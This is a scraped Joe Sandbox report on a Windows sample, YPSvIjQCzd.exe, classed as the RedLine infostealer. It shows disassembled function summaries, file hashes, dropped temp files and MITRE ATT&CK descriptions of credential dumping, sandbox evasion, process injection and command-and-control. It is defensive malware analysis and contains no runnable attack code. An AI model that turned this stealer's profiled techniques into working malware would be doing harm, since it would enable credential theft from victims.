Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0082924D

Strings

ListBox, xrefs: 00829217
ComboBox, xrefs: 008291EC

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: d0e12a6a01ebc445821d47db2a88b7481bf372bd15d609ed655f650b41e18788
Instruction ID: 1cb2d0198ef5fccd1d20f248f3722f15d9ff64dd92ecfcaf850f3d9650e084cb
Opcode Fuzzy Hash: d0e12a6a01ebc445821d47db2a88b7481bf372bd15d609ed655f650b41e18788
Instruction Fuzzy Hash: 0801D871A41118B7CB19E7A0D996EFF77A8EF45300F140115B962A3281EA145E0C8261

Function 00829264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 008292D0

Strings

ListBox, xrefs: 0082929C
ComboBox, xrefs: 00829271

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: cb13319ed34450f71f0c814ea3a35b5d9c63bca627871ad10f0fdc5359d6d833
Instruction ID: 1de7ba59d8a18a50579bcc31361131a1bf5b5a093d37bf90159f16c0ab0f29c4
Opcode Fuzzy Hash: cb13319ed34450f71f0c814ea3a35b5d9c63bca627871ad10f0fdc5359d6d833
Instruction Fuzzy Hash: BF01A771A41119F7CB15E7A4D986EFF77ACEF11300F240116B962A3282DA155E489271

Function 008351CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 008351E8
_wcscmp.LIBCMT ref: 008351FA

Strings

#32770, xrefs: 008351F4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: db833bf5446ccb59ef2c3ce79bd4908189157755d96fa4d768a662b04099a3e5
Instruction ID: ab1add8a86e954dc0226c79cd42c988fd45ad75fea259926d22a8db88b6746e9
Opcode Fuzzy Hash: db833bf5446ccb59ef2c3ce79bd4908189157755d96fa4d768a662b04099a3e5
Instruction Fuzzy Hash: 95E06832A0032C2BE320AA99AC49FA7F7ACFB45731F00006BFE10D3140E6649A048BE0

Function 008281BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008281CA

Part of subcall function 007F3598: _doexit.LIBCMT ref: 007F35A2

Strings

Error allocating memory., xrefs: 008281C3
AutoIt, xrefs: 008281BE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 4367c661ee1684f4ccdb0b5cb27c3a0b3be77cd1f48cee533e030aff56478e9d
Instruction ID: 16da7a2c53ddd170abaef5586337932e47db1a57b60ba165845bd116bb884a91
Opcode Fuzzy Hash: 4367c661ee1684f4ccdb0b5cb27c3a0b3be77cd1f48cee533e030aff56478e9d
Instruction Fuzzy Hash: 19D01232385318B2D61432A46C0EFDA75889B15B52F044016BB08956D38DD9559142D9

Function 0080B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0080B564: _memset.LIBCMT ref: 0080B571

Part of subcall function 007F0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00895158,00000000,00895144,0080B540,?,?,?,007D100A), ref: 007F0B89

IsDebuggerPresent.KERNEL32(?,?,?,007D100A), ref: 0080B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007D100A), ref: 0080B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0080B54E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 54a7e7c751ce3414ebfc555585a69adeee6e594c43c4d757817dc9d49d5e3ac1
Instruction ID: e5b82305b05e8046be24c28511fd626f0cf6e894714cf57cc1516f23105baa80
Opcode Fuzzy Hash: 54a7e7c751ce3414ebfc555585a69adeee6e594c43c4d757817dc9d49d5e3ac1
Instruction Fuzzy Hash: 3DE06DB02007118BD760DF68DC083427BE0FB00745F04896DE546C37A2E7B8D444CBA1

Function 00855BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00855BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00855C08

Part of subcall function 008354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0083555E

Strings

Shell_TrayWnd, xrefs: 00855BEE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9fefca78bc04e45c243d3ea458b538277c118a4736220e60906f19c004ebd1d4
Instruction ID: 451be0948ddaa6b784fb3a64654ef35a8f646a47418c7d84e22cce1c31df0026
Opcode Fuzzy Hash: 9fefca78bc04e45c243d3ea458b538277c118a4736220e60906f19c004ebd1d4
Instruction Fuzzy Hash: FBD0A931388300B7E368BB30AC0FF932A10FB00B02F000825B306EA1D1D8E85800C680

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YPSvIjQCzd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

C:\Users\user\AppData\Local\Temp\Keily

C:\Users\user\AppData\Local\Temp\autCDB.tmp

C:\Users\user\AppData\Local\Temp\autD3A.tmp

C:\Users\user\AppData\Local\Temp\lophophorine

C:\Users\user\AppData\Local\Temp\tmp1AF5.tmp

C:\Users\user\AppData\Local\Temp\tmp1B06.tmp

C:\Users\user\AppData\Local\Temp\tmp1B17.tmp

C:\Users\user\AppData\Local\Temp\tmp1B18.tmp

C:\Users\user\AppData\Local\Temp\tmp1B28.tmp

C:\Users\user\AppData\Local\Temp\tmp1B29.tmp

C:\Users\user\AppData\Local\Temp\tmp1B3A.tmp

C:\Users\user\AppData\Local\Temp\tmp1B3B.tmp

C:\Users\user\AppData\Local\Temp\tmp1B4C.tmp

Windows Analysis Report
YPSvIjQCzd.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre